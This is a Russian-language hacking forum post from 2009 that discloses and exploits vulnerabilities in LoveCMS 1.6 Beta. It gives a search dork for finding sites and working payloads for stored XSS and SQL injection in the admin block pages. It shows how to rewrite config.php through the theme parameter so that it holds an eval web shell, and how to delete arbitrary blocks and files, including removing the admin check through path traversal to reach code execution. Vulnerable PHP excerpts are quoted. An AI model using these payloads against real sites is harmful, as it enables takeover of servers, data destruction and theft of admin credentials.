LoveCMS 1.6Beta

LoveCMS 1.6Beta

15.04.2009, 17:06

eLWAux

Постоянный

Регистрация: 15.06.2008

Сообщений: 941

С нами: 9423746

Репутация: 2399

LoveCMS 1.6Beta

Скачать: тынц sourceforge
dork: "Powered by LoveCMS Green 1.6 Beta"

проверка на админство:
include(LOVE_ROOT . '/system/admin/love_head.php');
if($_SESSION[SESSION_ADMIN] != ADMIN_USER)..die();
во многих файлах идет сначала действие, а потом проверка))

---
AdminXSS & SQlinj
/system/admin/addblock.php

POST: submit=submit&title={XSS1}&content=content&type={i nsert_SQLinj}--+
в админке админ увидет title (т.е. ксс) при просмотре раздела "Blocks": (/system/admin/blocks.php)
exploit:

Код:

POST: submit=submit&title=TITLE<script>alert(/a/);</script>&content=CONTENT&type=plain

уязвимий кусок кода:

PHP код:


		
			
$db -> db_query("INSERT INTO " . DB_PREFIX . "blocks 

    (title, content, type, position, height, visible, owner) VALUES (

    '" . addslashes($_POST['title']) . "',

    '" . addslashes($_POST['content']) . "',

    '" . $_POST['type'] . "',

    'left',

    '0',

    'no',

    'system')");

---
config.php rewrite
/system/admin/themes.php

POST: submit=submit&theme={config_theme}&
define('THEME', 'LOVE_ROOT'); == define('THEME', $_POST['theme']);

exploit:

Код:

/system/admin/themes.php?submit=submit&theme=');eval(isset($_GET['c'])?$_GET['c']:'
^^ и получаем шелл: /config.php?c={EVAL}
также можна перезаписать ADMIN_USER, ADMIN_PASS, SESSION_ADMIN и другие конфиг-данные.
/config.php?c=print LOVE_ROOT; - полный путь

уязвимий кусок кода:

PHP код:


		
			
if(isset($_POST['submit']))

{

    $values = array(array('THEME', $_POST['theme']));

    open_config_file();

    write_config_file($values);

    close_config_file();

    redirect_with_message('msg', 'LANG_046');

}..

include(LOVE_ROOT . '/system/admin/love_head.php');

---
XSS & sqlInj
/system/admin/editblock.php

GET: id={номер}&
POST: title={XSS}&content=O_o&type={update_sqlInj}');--+

уязвимий кусок кода:

PHP код:


		
			
if(!is_numeric($_GET['id']))

{

    redirect_with_message('msg', 'LANG_118', 'blocks.php');

}



if(isset($_POST['submit']))

{

    $db -> db_query("UPDATE " . DB_PREFIX . "blocks SET

    title = '" . addslashes($_POST['title']) . "',

    content = '" . addslashes($_POST['content']) . "',

    type = '" . $_POST['type'] . "' 

    WHERE id = '" . $_GET['id'] . "'");

    

    redirect_with_message('msg', 'LANG_119', 'blocks.php');

}



include(LOVE_ROOT . '/system/admin/love_head.php');

---
удаления любого блока
/system/admin/blocks.php

^^ удаление БЛОКА с табл. _blocks с id=$_GET[delete]
GET: delete={номер}&

уязвимий кусок кода:

PHP код:


		
			
if(isset($_GET['delete']))

{

    if(is_numeric($_GET['delete']))

    {

        $db -> db_query("DELETE FROM " . DB_PREFIX . "blocks 

        WHERE id = '" . $_GET['delete'] . "'");

        

        redirect_with_message('msg', 'LANG_111');

    }

}

...

include(LOVE_ROOT . '/system/admin/love_head.php');

---
удаление файлов
/system/admin/images.php

GET: delete={site.com/uploads/FILENAME}

уязвимий кусок кода:

PHP код:


		
			
if($_GET['delete'])

{



    $filename = $_GET['delete'];

    $sql = $db -> db_query("DELETE FROM " . DB_PREFIX . "images 

    WHERE filename = '$filename'");

    unlink(LOVE_ROOT . '/uploads/' . $filename);

    unlink(LOVE_ROOT . '/uploads/thumbs/' . $filename);

    redirect_with_message('msg', 'LANG_088');

}

include(LOVE_ROOT . '/system/admin/love_head.php');

---
phpinfo

Код:

удаляем проверку на админа:
/system/admin/images.php?delete=../system/admin/love_head.php
смотрим phpinfo:
/system/admin/phpinfo.php

или:

Код:

перезаписиваем config.php:
/system/admin/themes.php?submit=submit&theme=');eval(isset($_GET['c'])?$_GET['c']:'
выполняем команду phpinfo() :
/config.php?c=phpinfo();

𝕏 Twitter Reddit Telegram Копировать ссылку